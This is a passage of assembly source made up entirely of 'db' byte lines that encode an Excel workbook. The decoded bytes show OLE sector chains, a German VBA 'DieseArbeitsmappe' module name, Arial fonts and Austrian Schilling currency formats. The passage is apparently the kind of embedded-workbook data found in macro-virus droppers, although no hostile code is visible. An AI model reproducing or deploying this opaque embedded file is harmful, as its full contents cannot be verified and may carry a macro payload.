db 04Ah, 03Fh, 085h, 0BFh, 001h, 0E6h, 00Ch, 000h
|
|||
|
db 056h, 000h, 042h, 000h, 041h, 0E6h, 03Bh, 000h
|
|||
|
db 008h, 000h, 001h, 000h, 0E6h, 008h, 0FFh, 005h
|
|||
|
db 0E6h, 017h, 000h, 0A0h, 03Ch, 035h, 04Ah, 03Fh
|
|||
|
db 085h, 0BFh, 001h, 0A0h, 03Ch, 035h, 04Ah, 03Fh
|
|||
|
db 085h, 0BFh, 001h, 0E6h, 00Ch, 000h, 001h, 000h
|
|||
|
db 000h, 000h, 002h, 000h, 000h, 000h, 003h, 000h
|
|||
|
db 000h, 000h, 004h, 000h, 000h, 000h, 005h, 000h
|
|||
|
db 000h, 000h, 006h, 000h, 000h, 000h, 007h, 000h
|
|||
|
db 000h, 000h, 008h, 000h, 000h, 000h, 009h, 000h
|
|||
|
db 000h, 000h, 00Ah, 000h, 000h, 000h, 00Bh, 000h
|
|||
|
db 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh, 000h
|
|||
|
db 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh, 000h
|
|||
|
db 000h, 000h, 010h, 000h, 000h, 000h, 011h, 000h
|
|||
|
db 000h, 000h, 012h, 000h, 000h, 000h, 013h, 000h
|
|||
|
db 000h, 000h, 014h, 000h, 000h, 000h, 015h, 000h
|
|||
|
db 000h, 000h, 016h, 000h, 000h, 000h, 017h, 000h
|
|||
|
db 000h, 000h, 018h, 000h, 000h, 000h, 019h, 000h
|
|||
|
db 000h, 000h, 01Ah, 000h, 000h, 000h, 01Bh, 000h
|
|||
|
db 000h, 000h, 01Ch, 000h, 000h, 000h, 01Dh, 000h
|
|||
|
db 000h, 000h, 01Eh, 000h, 000h, 000h, 01Fh, 000h
|
|||
|
db 000h, 000h, 020h, 000h, 000h, 000h, 021h, 000h
|
|||
|
db 000h, 000h, 022h, 000h, 000h, 000h, 023h, 000h
|
|||
|
db 000h, 000h, 024h, 000h, 000h, 000h, 025h, 000h
|
|||
|
db 000h, 000h, 026h, 000h, 000h, 000h, 027h, 000h
|
|||
|
db 000h, 000h, 028h, 000h, 000h, 000h, 029h, 000h
|
|||
|
db 000h, 000h, 02Ah, 000h, 000h, 000h, 0FEh, 0FFh
|
|||
|
db 0FFh, 0FFh, 02Ch, 000h, 000h, 000h, 02Dh, 000h
|
|||
|
db 000h, 000h, 02Eh, 000h, 000h, 000h, 02Fh, 000h
|
|||
|
db 000h, 000h, 030h, 000h, 000h, 000h, 031h, 000h
|
|||
|
db 000h, 000h, 032h, 000h, 000h, 000h, 033h, 000h
|
|||
|
db 000h, 000h, 034h, 000h, 000h, 000h, 035h, 000h
|
|||
|
db 000h, 000h, 036h, 000h, 000h, 000h, 037h, 000h
|
|||
|
db 000h, 000h, 038h, 000h, 000h, 000h, 039h, 000h
|
|||
|
db 000h, 000h, 03Ah, 000h, 000h, 000h, 0FEh, 0FFh
|
|||
|
db 0FFh, 0FFh, 03Ch, 000h, 000h, 000h, 03Dh, 000h
|
|||
|
db 000h, 000h, 03Eh, 000h, 000h, 000h, 03Fh, 000h
|
|||
|
db 000h, 000h, 040h, 000h, 000h, 000h, 041h, 000h
|
|||
|
db 000h, 000h, 042h, 000h, 000h, 000h, 043h, 000h
|
|||
|
db 000h, 000h, 044h, 000h, 000h, 000h, 045h, 000h
|
|||
|
db 000h, 000h, 046h, 000h, 000h, 000h, 047h, 000h
|
|||
|
db 000h, 000h, 048h, 000h, 000h, 000h, 049h, 000h
|
|||
|
db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 04Bh, 000h
|
|||
|
db 000h, 000h, 04Ch, 000h, 000h, 000h, 04Dh, 000h
|
|||
|
db 000h, 000h, 04Eh, 000h, 000h, 000h, 04Fh, 000h
|
|||
|
db 000h, 000h, 050h, 000h, 000h, 000h, 051h, 000h
|
|||
|
db 000h, 000h, 052h, 000h, 000h, 000h, 053h, 000h
|
|||
|
db 000h, 000h, 054h, 000h, 000h, 000h, 055h, 000h
|
|||
|
db 000h, 000h, 056h, 000h, 000h, 000h, 057h, 000h
|
|||
|
db 000h, 000h, 058h, 000h, 000h, 000h, 059h, 000h
|
|||
|
db 000h, 000h, 05Ah, 000h, 000h, 000h, 05Bh, 000h
|
|||
|
db 000h, 000h, 05Ch, 000h, 000h, 000h, 05Dh, 000h
|
|||
|
db 000h, 000h, 05Eh, 000h, 000h, 000h, 05Fh, 000h
|
|||
|
db 000h, 000h, 060h, 000h, 000h, 000h, 061h, 000h
|
|||
|
db 000h, 000h, 062h, 000h, 000h, 000h, 063h, 000h
|
|||
|
db 000h, 000h, 064h, 000h, 000h, 000h, 065h, 000h
|
|||
|
db 000h, 000h, 066h, 000h, 000h, 000h, 0FEh, 0FFh
|
|||
|
db 0FFh, 0FFh, 068h, 000h, 000h, 000h, 069h, 000h
|
|||
|
db 000h, 000h, 06Ah, 000h, 000h, 000h, 06Bh, 000h
|
|||
|
db 000h, 000h, 06Ch, 000h, 000h, 000h, 06Dh, 000h
|
|||
|
db 000h, 000h, 06Eh, 000h, 000h, 000h, 06Fh, 000h
|
|||
|
db 000h, 000h, 070h, 000h, 000h, 000h, 071h, 000h
|
|||
|
db 000h, 000h, 072h, 000h, 000h, 000h, 073h, 000h
|
|||
|
db 000h, 000h, 074h, 000h, 000h, 000h, 075h, 000h
|
|||
|
db 000h, 000h, 076h, 000h, 000h, 000h, 077h, 000h
|
|||
|
db 000h, 000h, 078h, 000h, 000h, 000h, 079h, 000h
|
|||
|
db 000h, 000h, 07Ah, 000h, 000h, 000h, 07Bh, 000h
|
|||
|
db 000h, 000h, 07Ch, 000h, 000h, 000h, 07Dh, 000h
|
|||
|
db 000h, 000h, 07Eh, 000h, 000h, 000h, 07Fh, 000h
|
|||
|
db 000h, 000h, 080h, 000h, 000h, 000h, 009h, 008h
|
|||
|
db 010h, 000h, 000h, 006h, 005h, 000h, 0D3h, 010h
|
|||
|
db 0CCh, 007h, 041h, 000h, 000h, 000h, 006h, 000h
|
|||
|
db 000h, 000h, 0E1h, 000h, 002h, 000h, 0B0h, 004h
|
|||
|
db 0C1h, 000h, 002h, 000h, 000h, 000h, 0E2h, 000h
|
|||
|
db 000h, 000h, 05Ch, 000h, 070h, 000h, 001h, 000h
|
|||
|
db 000h, 042h, 0E6h, 06Ch, 020h, 042h, 000h, 002h
|
|||
|
db 000h, 0B0h, 004h, 061h, 001h, 002h, 000h, 000h
|
|||
|
db 000h, 03Dh, 001h, 002h, 000h, 001h, 000h, 0D3h
|
|||
|
db 000h, 000h, 000h, 0BAh, 001h, 014h, 000h, 011h
|
|||
|
db 000h, 000h, 044h, 069h, 065h, 073h, 065h, 041h
|
|||
|
db 072h, 062h, 065h, 069h, 074h, 073h, 06Dh, 061h
|
|||
|
db 070h, 070h, 065h, 09Ch, 000h, 002h, 000h, 00Eh
|
|||
|
db 000h, 019h, 000h, 002h, 000h, 000h, 000h, 012h
|
|||
|
db 000h, 002h, 000h, 000h, 000h, 013h, 000h, 002h
|
|||
|
db 000h, 000h, 000h, 0AFh, 001h, 002h, 000h, 000h
|
|||
|
db 000h, 0BCh, 001h, 002h, 000h, 000h, 000h, 03Dh
|
|||
|
db 000h, 012h, 000h, 0F0h, 000h, 087h, 000h, 0DCh
|
|||
|
db 023h, 094h, 011h, 039h, 0E6h, 005h, 000h, 001h
|
|||
|
db 000h, 058h, 002h, 040h, 000h, 002h, 000h, 000h
|
|||
|
db 000h, 08Dh, 000h, 002h, 000h, 000h, 000h, 022h
|
|||
|
db 000h, 002h, 000h, 000h, 000h, 00Eh, 000h, 002h
|
|||
|
db 000h, 001h, 000h, 0B7h, 001h, 002h, 000h, 000h
|
|||
|
db 000h, 0DAh, 000h, 002h, 000h, 000h, 000h, 031h
|
|||
|
db 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h, 0FFh
|
|||
|
db 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h, 001h
|
|||
|
db 041h, 000h, 072h, 000h, 069h, 000h, 061h, 000h
|
|||
|
db 06Ch, 000h, 031h, 000h, 01Ah, 000h, 0C8h, 000h
|
|||
|
db 000h, 000h, 0FFh, 07Fh, 090h, 001h, 0E6h, 006h
|
|||
|
db 000h, 005h, 001h, 041h, 000h, 072h, 000h, 069h
|
|||
|
db 000h, 061h, 000h, 06Ch, 000h, 031h, 000h, 01Ah
|
|||
|
db 000h, 0C8h, 000h, 000h, 000h, 0FFh, 07Fh, 090h
|
|||
|
db 001h, 0E6h, 006h, 000h, 005h, 001h, 041h, 000h
|
|||
|
db 072h, 000h, 069h, 000h, 061h, 000h, 06Ch, 000h
|
|||
|
db 031h, 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h
|
|||
|
db 0FFh, 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h
|
|||
|
db 001h, 041h, 000h, 072h, 000h, 069h, 000h, 061h
|
|||
|
db 000h, 06Ch, 000h, 01Eh, 004h, 01Eh, 000h, 005h
|
|||
|
db 000h, 019h, 000h, 000h, 022h, 0F6h, 053h, 022h
|
|||
|
db 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h, 03Bh
|
|||
|
db 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h
|
|||
|
db 023h, 02Ch, 023h, 023h, 030h, 01Eh, 004h, 023h
|
|||
|
db 000h, 006h, 000h, 01Eh, 000h, 000h, 022h, 0F6h
|
|||
|
db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h
|
|||
|
db 030h, 03Bh, 05Bh, 052h, 065h, 064h, 05Dh, 05Ch
|
|||
|
db 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h, 023h
|
|||
|
db 02Ch, 023h, 023h, 030h, 01Eh, 004h, 024h, 000h
|
|||
|
db 007h, 000h, 01Fh, 000h, 000h, 022h, 0F6h, 053h
|
|||
|
db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h
|
|||
|
db 02Eh, 030h, 030h, 03Bh, 05Ch, 02Dh, 022h, 0F6h
|
|||
|
db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h
|
|||
|
db 030h, 02Eh, 030h, 030h, 01Eh, 004h, 029h, 000h
|
|||
|
db 008h, 000h, 024h, 000h, 000h, 022h, 0F6h, 053h
|
|||
|
db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h
|
|||
|
db 02Eh, 030h, 030h, 03Bh, 05Bh, 052h, 065h, 064h
|
|||
|
db 05Dh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch
|
|||
|
db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h
|
|||
|
db 030h, 01Eh, 004h, 03Eh, 000h, 02Ah, 000h, 039h
|
|||
|
db 000h, 000h, 05Fh, 02Dh, 022h, 0F6h, 053h, 022h
|
|||
|
db 05Ch, 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h
|
|||
|
db 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 022h, 0F6h
|
|||
|
db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch
|
|||
|
db 023h, 023h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
|
|||
|
db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h
|
|||
|
db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
|
|||
|
db 040h, 05Fh, 02Dh, 01Eh, 004h, 02Ch, 000h, 029h
|
|||
|
db 000h, 027h, 000h, 000h, 05Fh, 02Dh, 02Ah, 020h
|
|||
|
db 023h, 02Ch, 023h, 023h, 030h, 05Fh, 02Dh, 03Bh
|
|||
|
db 05Ch, 02Dh, 02Ah, 020h, 023h, 02Ch, 023h, 023h
|
|||
|
db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h
|
|||
|
db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
|
|||
|
db 040h, 05Fh, 02Dh, 01Eh, 004h, 046h, 000h, 02Ch
|
|||
|
db 000h, 041h, 000h, 000h, 05Fh, 02Dh, 022h, 0F6h
|
|||
|
db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch
|
|||
|
db 023h, 023h, 030h, 02Eh, 030h, 030h, 05Fh, 02Dh
|
|||
|
db 03Bh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch
|
|||
|
db 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h
|
|||
|
db 02Eh, 030h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
|
|||
|
db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h
|
|||
|
db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh
|
|||
|
db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 01Eh, 004h, 034h
|
|||
|
db 000h, 02Bh, 000h, 02Fh, 000h, 000h, 05Fh, 02Dh
|
|||
|
db 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh
|
|||
|
db 030h, 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 02Ah
|
|||
|
db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h
|
|||
|
db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h
|
|||
|
db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh
|
|||
|
db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 0E0h, 000h, 014h
|
|||
|
db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 0E6h, 00Bh
|
|||
|
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h
|
|||
|
db 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h, 000h
|
|||
|
db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h
|
|||
|
db 014h, 000h, 001h, 000h, 000h, 000h, 0F5h, 0FFh
|
|||
|
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
|
|||
|
db 020h, 0E0h, 000h, 014h, 000h, 002h, 000h, 000h
|
|||
|
db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h
|
|||
|
db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h
|
|||
|
db 002h, 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h
|
|||
|
db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h
|
|||
|
db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h
|
|||
|
db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h
|
|||
|
db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh
|
|||
|
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
|
|||
|
db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h
|
|||
|
db 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h
|
|||
|
db 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h
|
|||
|
db 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h
|
|||
|
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h
|
|||
|
db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h
|
|||
|
db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h
|
|||
|
db 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h
|
|||
|
db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h
|
|||
|
db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h
|
|||
|
db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h
|
|||
|
db 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h
|
|||
|
db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h
|
|||
|
db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h
|
|||
|
db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h
|
|||
|
db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh
|
|||
|
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
|
|||
|
db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 001h
|
|||
|
db 000h, 020h, 0E6h, 00Bh, 000h, 0C0h, 020h, 0E0h
|
|||
|
db 000h, 014h, 000h, 001h, 000h, 02Bh, 000h, 0F5h
|
|||
|
db 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h, 000h
|
|||
|
db 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h, 000h
|
|||
|
db 029h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F8h
|
|||
|
db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h
|
|||
|
db 000h, 001h, 000h, 009h, 000h, 0F5h, 0FFh, 020h
|
|||
|
db 000h, 000h, 0F8h, 0E6h, 008h, 000h, 0C0h, 020h
|
|||
|
db 0E0h, 000h, 014h, 000h, 001h, 000h, 02Ch, 000h
|
|||
|
db 0F5h, 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h
|
|||
|
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h
|
|||
|
db 000h, 02Ah, 000h, 0F5h, 0FFh, 020h, 000h, 000h
|
|||
|
db 0F8h, 0E6h, 008h, 000h, 0C0h, 020h, 093h, 002h
|
|||
|
db 004h, 000h, 010h, 080h, 003h, 0FFh, 093h, 002h
|
|||
|
db 004h, 000h, 011h, 080h, 006h, 0FFh, 093h, 002h
|
|||
|
db 004h, 000h, 012h, 080h, 005h, 0FFh, 093h, 002h
|
|||
|
db 004h, 000h, 000h, 080h, 000h, 0FFh, 093h, 002h
|
|||
|
db 004h, 000h, 013h, 080h, 004h, 0FFh, 093h, 002h
|
|||
|
db 004h, 000h, 014h, 080h, 007h, 0FFh, 060h, 001h
|
|||
|
db 002h, 000h, 001h, 000h, 085h, 000h, 010h, 000h
|
|||
|
db 086h, 009h, 0E6h, 004h, 000h, 008h, 000h, 054h
|
|||
|
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 08Ch
|
|||
|
db 000h, 004h, 000h, 031h, 000h, 02Bh, 000h, 0FCh
|
|||
|
db 000h, 008h, 0E6h, 009h, 000h, 0FFh, 000h, 0FAh
|
|||
|
db 003h, 008h, 000h, 0FFh, 0FFh, 040h, 000h, 000h
|
|||
|
db 000h, 040h, 010h, 045h, 000h, 000h, 000h, 040h
|
|||
|
db 000h, 001h, 000h, 000h, 000h, 00Ch, 000h, 040h
|
|||
|
db 000h, 051h, 004h, 0E6h, 00Ah, 000h, 085h, 084h
|
|||
|
db 0F7h, 0BFh, 001h, 000h, 000h, 000h, 09Ch, 084h
|
|||
|
db 0F7h, 0BFh, 000h, 000h, 040h, 000h, 001h, 000h
|
|||
|
db 000h, 000h, 038h, 0C6h, 062h, 0E6h, 005h, 000h
|
|||
|
db 001h, 0E6h, 007h, 000h, 005h, 040h, 000h, 080h
|
|||
|
db 002h, 094h, 0F7h, 0BFh, 000h, 000h, 040h, 000h
|
|||
|
db 004h, 000h, 000h, 000h, 0E0h, 006h, 09Ch, 000h
|
|||
|
db 00Ah, 000h, 000h, 000h, 020h, 000h, 000h, 000h
|
|||
|
db 0FAh, 07Eh, 070h, 030h, 00Ah, 000h, 000h, 000h
|
|||
|
db 00Ah, 000h, 000h, 000h, 007h, 00Ch, 000h, 000h
|
|||
|
db 001h, 000h, 000h, 000h, 0E8h, 006h, 09Ch, 000h
|
|||
|
db 0B4h, 0C5h, 062h, 0E6h, 00Dh, 000h, 0E6h, 008h
|
|||
|
db 0FFh, 09Ch, 030h, 075h, 0E6h, 005h, 000h, 069h
|
|||
|
db 000h, 075h, 000h, 0FFh, 0FFh, 0FFh, 0E7h, 0E6h
|
|||
|
db 004h, 000h, 05Ch, 000h, 063h, 000h, 005h, 000h
|
|||
|
db 000h, 000h, 05Ch, 000h, 064h, 000h, 065h, 000h
|
|||
|
db 06Dh, 000h, 003h, 0E6h, 007h, 000h, 028h, 0D0h
|
|||
|
db 09Dh, 030h, 0E6h, 008h, 000h, 0E6h, 004h, 0FFh
|
|||
|
db 0E6h, 014h, 000h, 002h, 007h, 002h, 002h, 0E6h
|
|||
|
db 004h, 0FFh, 0E6h, 004h, 000h, 003h, 000h, 000h
|
|||
|
db 000h, 070h, 000h, 07Eh, 030h, 0C3h, 07Ch, 070h
|
|||
|
db 030h, 004h, 000h, 000h, 000h, 004h, 0E6h, 007h
|
|||
|
db 000h, 001h, 000h, 000h, 000h, 04Eh, 087h, 075h
|
|||
|
db 000h, 082h, 0D8h, 07Eh, 030h, 003h, 000h, 000h
|
|||
|
db 000h, 003h, 0E6h, 00Bh, 000h, 061h, 07Ah, 070h
|
|||
|
db 030h, 0D4h, 006h, 09Ch, 000h, 00Ah, 000h, 000h
|
|||
|
db 000h, 0A0h, 0C5h, 062h, 000h, 00Ah, 000h, 000h
|
|||
|
db 000h, 001h, 000h, 000h, 000h, 00Ah, 000h, 000h
|
|||
|
db 000h, 0A0h, 0C5h, 062h, 000h, 0D4h, 006h, 09Ch
|
|||
|
db 000h, 00Ah, 0E6h, 00Bh, 000h, 028h, 0D0h, 09Dh
|
|||
|
db 030h, 0E6h, 008h, 000h, 002h, 000h, 000h, 000h
|
|||
|
db 0FFh, 003h, 000h, 000h, 001h, 000h, 000h, 000h
|
|||
|
db 001h, 000h, 000h, 000h, 001h, 000h, 000h, 000h
|
|||
|
db 020h, 010h, 000h, 000h, 018h, 0E6h, 007h, 000h
|
|||
|
db 084h, 0F6h, 053h, 030h, 05Ch, 0C5h, 062h, 000h
|
|||
|
db 05Dh, 0E6h, 007h, 000h, 002h, 000h, 0C8h, 030h
|
|||
|
db 000h, 000h, 0C5h, 030h, 0E6h, 004h, 000h, 061h
|
|||
|
db 07Ah, 070h, 030h, 04Ch, 087h, 075h, 000h, 004h
|
|||
|
db 000h, 000h, 000h, 07Eh, 00Eh, 002h, 002h, 0E1h
|
|||
|
db 03Ch, 06Dh, 030h, 016h, 000h, 0C8h, 030h, 0D3h
|
|||
|
db 000h, 000h, 000h, 09Eh, 0C5h, 062h, 000h, 0FCh
|
|||
|
db 000h, 000h, 000h, 009h, 000h, 000h, 000h, 0CDh
|
|||
|
db 015h, 004h, 030h, 000h, 000h, 0C5h, 030h, 004h
|
|||
|
db 02Ah, 0C8h, 030h, 039h, 015h, 000h, 030h, 007h
|
|||
|
db 00Ch, 000h, 000h, 001h, 000h, 000h, 000h, 0D4h
|
|||
|
db 006h, 09Ch, 000h, 00Ah, 000h, 000h, 000h, 0A0h
|
|||
|
db 0C5h, 062h, 000h, 00Ah, 000h, 000h, 000h, 0D0h
|
|||
|
db 006h, 09Ch, 0E6h, 005h, 000h, 0A0h, 0C7h, 062h
|
|||
|
db 000h, 05Dh, 0E6h, 007h, 000h, 08Eh, 08Fh, 00Fh
|
|||
|
db 030h, 0E6h, 004h, 000h, 09Ch, 0C5h, 062h, 000h
|
|||
|
db 00Bh, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 070h
|
|||
|
db 006h, 09Ch, 000h, 0DCh, 0C7h, 062h, 000h, 004h
|
|||
|
db 000h, 000h, 000h, 00Bh, 000h, 057h, 000h, 0E4h
|
|||
|
db 000h, 068h, 000h, 072h, 000h, 075h, 000h, 06Eh
|
|||
|
db 000h, 067h, 000h, 020h, 000h, 05Bh, 000h, 030h
|
|||
|
db 000h, 05Dh, 000h, 000h, 000h, 05Fh, 000h, 000h
|
|||
|
db 000h, 001h, 000h, 008h, 000h, 09Ah, 00Dh, 0E6h
|
|||
|
db 004h, 000h, 0AEh, 082h, 070h, 030h, 007h, 00Ch
|
|||
|
db 000h, 000h, 001h, 000h, 000h, 000h, 04Ch, 087h
|
|||
|
db 075h, 000h, 004h, 000h, 000h, 000h, 080h, 0D8h
|
|||
|
db 07Eh, 030h, 004h, 000h, 000h, 000h, 0AEh, 082h
|
|||
|
db 070h, 030h, 007h, 00Ch, 000h, 000h, 001h, 000h
|
|||
|
db 000h, 000h, 064h, 000h, 098h, 000h, 002h, 000h
|
|||
|
db 000h, 000h, 065h, 010h, 000h, 030h, 064h, 000h
|
|||
|
db 098h, 000h, 096h, 06Ah, 054h, 030h, 004h, 000h
|
|||
|
db 000h, 000h, 0D9h, 010h, 000h, 030h, 096h, 06Ah
|
|||
|
db 054h, 030h, 052h, 070h, 054h, 030h, 0C2h, 0C8h
|
|||
|
db 010h, 030h, 096h, 01Ah, 09Ah, 000h, 050h, 000h
|
|||
|
db 098h, 000h, 065h, 010h, 000h, 030h, 050h, 000h
|
|||
|
db 098h, 000h, 096h, 01Ah, 09Ah, 000h, 002h, 000h
|
|||
|
db 000h, 000h, 0DDh, 088h, 00Fh, 030h, 096h, 01Ah
|
|||
|
db 09Ah, 000h, 050h, 000h, 098h, 000h, 001h, 000h
|
|||
|
db 000h, 000h, 060h, 01Ah, 09Ah, 0E6h, 005h, 000h
|
|||
|
db 008h, 000h, 098h, 000h, 0FCh, 001h, 098h, 0E6h
|
|||
|
db 009h, 000h, 0A4h, 01Ah, 09Ah, 0E6h, 00Dh, 000h
|
|||
|
db 03Fh, 0E6h, 007h, 000h, 0B0h, 0C6h, 062h, 000h
|
|||
|
db 039h, 086h, 00Fh, 030h, 006h, 000h, 000h, 000h
|
|||
|
db 060h, 01Ah, 09Ah, 000h, 02Dh, 000h, 000h, 000h
|
|||
|
db 007h, 000h, 000h, 000h, 006h, 002h, 098h, 000h
|
|||
|
db 0DEh, 0C7h, 062h, 000h, 0DCh, 0C7h, 062h, 000h
|
|||
|
db 008h, 000h, 098h, 000h, 007h, 000h, 000h, 000h
|
|||
|
db 03Dh, 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h
|
|||
|
db 0E6h, 004h, 000h, 065h, 010h, 000h, 030h, 070h
|
|||
|
db 06Ah, 054h, 030h, 0ECh, 004h, 09Ah, 000h, 04Ch
|
|||
|
db 000h, 000h, 000h, 0D9h, 010h, 000h, 030h, 0ECh
|
|||
|
db 004h, 09Ah, 000h, 070h, 06Ah, 054h, 030h, 04Ch
|
|||
|
db 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h, 0BAh
|
|||
|
db 0C7h, 062h, 000h, 0C0h, 0C7h, 062h, 0E6h, 00Dh
|
|||
|
db 000h, 0A2h, 0C7h, 010h, 030h, 009h, 004h, 0E6h
|
|||
|
db 00Ah, 000h, 024h, 000h, 000h, 000h, 0FCh, 0E7h
|
|||
|
db 062h, 000h, 0F3h, 083h, 00Fh, 030h, 04Ch, 0C7h
|
|||
|
db 062h, 000h, 001h, 000h, 000h, 000h, 010h, 0A3h
|
|||
|
db 09Ah, 0E6h, 009h, 000h, 0C0h, 0C7h, 062h, 0E6h
|
|||
|
db 005h, 000h, 010h, 0A3h, 09Ah, 0E6h, 005h, 000h
|
|||
|
db 0F4h, 0C6h, 062h, 000h, 06Eh, 083h, 00Fh, 030h
|
|||
|
db 0E6h, 024h, 000h, 038h, 005h, 09Ch, 000h, 0DCh
|
|||
|
db 0C7h, 062h, 000h, 014h, 000h, 000h, 000h, 0E0h
|
|||
|
db 000h, 000h, 000h, 0A8h, 0C7h, 062h, 000h, 0FCh
|
|||
|
db 0E7h, 062h, 0E6h, 005h, 000h, 01Ch, 0A2h, 09Ah
|
|||
|
db 000h, 0C4h, 0C7h, 062h, 000h, 09Ah, 020h, 000h
|
|||
|
db 030h, 01Ch, 0A2h, 09Ah, 000h, 073h, 090h, 00Ah
|
|||
|
db 000h, 000h, 000h, 009h, 008h, 010h, 000h, 000h
|
|||
|
db 006h, 010h, 000h, 0D3h, 010h, 0CCh, 007h, 041h
|
|||
|
db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 00Bh
|
|||
|
db 002h, 010h, 0E6h, 00Dh, 000h, 03Eh, 00Ah, 000h
|
|||
|
db 000h, 00Dh, 000h, 002h, 000h, 001h, 000h, 00Ch
|
|||
|
db 000h, 002h, 000h, 064h, 000h, 00Fh, 000h, 002h
|
|||
|
db 000h, 001h, 000h, 011h, 000h, 002h, 000h, 000h
|
|||
|
db 000h, 010h, 000h, 008h, 000h, 0FCh, 0A9h, 0F1h
|
|||
|
db 0D2h, 04Dh, 062h, 050h, 03Fh, 05Fh, 000h, 002h
|
|||
|
db 000h, 001h, 000h, 02Ah, 000h, 002h, 000h, 000h
|
|||
|
db 000h, 02Bh, 000h, 002h, 000h, 000h, 000h, 082h
|
|||
|
db 000h, 002h, 000h, 001h, 000h, 080h, 000h, 008h
|
|||
|
db 0E6h, 009h, 000h, 025h, 002h, 004h, 000h, 000h
|
|||
|
db 000h, 0FFh, 000h, 081h, 000h, 002h, 000h, 0C1h
|
|||
|
db 004h, 014h, 000h, 000h, 000h, 015h, 000h, 000h
|
|||
|
db 000h, 083h, 000h, 002h, 000h, 000h, 000h, 084h
|
|||
|
db 000h, 002h, 000h, 000h, 000h, 0A1h, 000h, 022h
|
|||
|
db 000h, 000h, 000h, 0FFh, 000h, 001h, 000h, 001h
|
|||
|
db 000h, 001h, 000h, 004h, 000h, 0DEh, 0C7h, 062h
|
|||
|
